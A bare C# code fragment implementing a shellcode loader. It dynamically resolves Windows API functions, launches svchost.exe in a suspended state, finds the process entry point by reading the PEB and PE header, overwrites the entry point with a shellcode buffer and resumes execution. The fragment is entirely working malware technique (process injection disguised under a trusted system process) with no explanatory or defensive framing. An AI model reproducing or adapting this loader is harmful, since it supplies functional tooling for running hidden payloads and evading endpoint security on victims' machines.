static void Main(string[] args) { IntPtr pointer = Invoke.GetLibraryAddress("kernel32.dll", "CreateProcessA"); DELEGATES.CreateProcess CreateProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.CreateProcess)) as DELEGATES.CreateProcess; pointer = Invoke.GetLibraryAddress("Ntdll.dll", "ZwQueryInformationProcess"); DELEGATES.ZwQueryInformationProcess ZwQueryInformationProcess = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ZwQueryInformationProcess)) as DELEGATES.ZwQueryInformationProcess; pointer = Invoke.GetLibraryAddress("kernel32.dll", "ReadProcessMemory"); DELEGATES.ReadProcessMemory ReadProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ReadProcessMemory)) as DELEGATES.ReadProcessMemory; pointer = Invoke.GetLibraryAddress("kernel32.dll", "WriteProcessMemory"); DELEGATES.WriteProcessMemory WriteProcessMemory = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.WriteProcessMemory)) as DELEGATES.WriteProcessMemory; pointer = Invoke.GetLibraryAddress("kernel32.dll", "ResumeThread"); DELEGATES.ResumeThread ResumeThread = Marshal.GetDelegateForFunctionPointer(pointer, typeof(DELEGATES.ResumeThread)) as DELEGATES.ResumeThread; STRUCTS.STARTUPINFO si = new STRUCTS.STARTUPINFO(); STRUCTS.PROCESS_INFORMATION pi = new STRUCTS.PROCESS_INFORMATION(); STRUCTS.SECURITY_ATTRIBUTES lpa = new STRUCTS.SECURITY_ATTRIBUTES(); STRUCTS.SECURITY_ATTRIBUTES lta = new STRUCTS.SECURITY_ATTRIBUTES(); STRUCTS.PROCESS_BASIC_INFORMATION pbi = new STRUCTS.PROCESS_BASIC_INFORMATION(); uint temp = 0; bool succ = CreateProcess(null, "C:\\windows\\system32\\svchost.exe", ref lpa, ref lta, false, STRUCTS.ProcessCreationFlags.CREATE_SUSPENDED, IntPtr.Zero, null, ref si, out pi); /* if (succ) * { * Console.WriteLine("Process Created"); * Console.WriteLine(" |Process ID->" + pi.dwProcessId); * } */ UInt32 success = ZwQueryInformationProcess(pi.hProcess, 0x0, ref pbi, (uint)(IntPtr.Size * 6), ref temp); IntPtr ptrToBaseImage = (IntPtr)((Int64)pbi.PebBaseAddress + 0x10); byte[] addrBuf = new byte[IntPtr.Size]; IntPtr nread = IntPtr.Zero; succ = ReadProcessMemory(pi.hProcess, ptrToBaseImage, addrBuf, addrBuf.Length, out nread); /* if (succ) * { * Console.WriteLine("Process Read"); * } */ IntPtr processBase = (IntPtr)BitConverter.ToInt64(addrBuf, 0); byte[] data = new byte[0x200]; ReadProcessMemory(pi.hProcess, processBase, data, data.Length, out nread); uint e_lfanew_offset = BitConverter.ToUInt32(data, 0x3c); uint opthdr = e_lfanew_offset + 0x28; uint entrypoint_rva = BitConverter.ToUInt32(data, (int)opthdr); IntPtr addressofentrypoint = (IntPtr)(entrypoint_rva + (UInt64)processBase); WriteProcessMemory(pi.hProcess, addressofentrypoint, buf(), buf().Length, out nread); ResumeThread(pi.hThread); }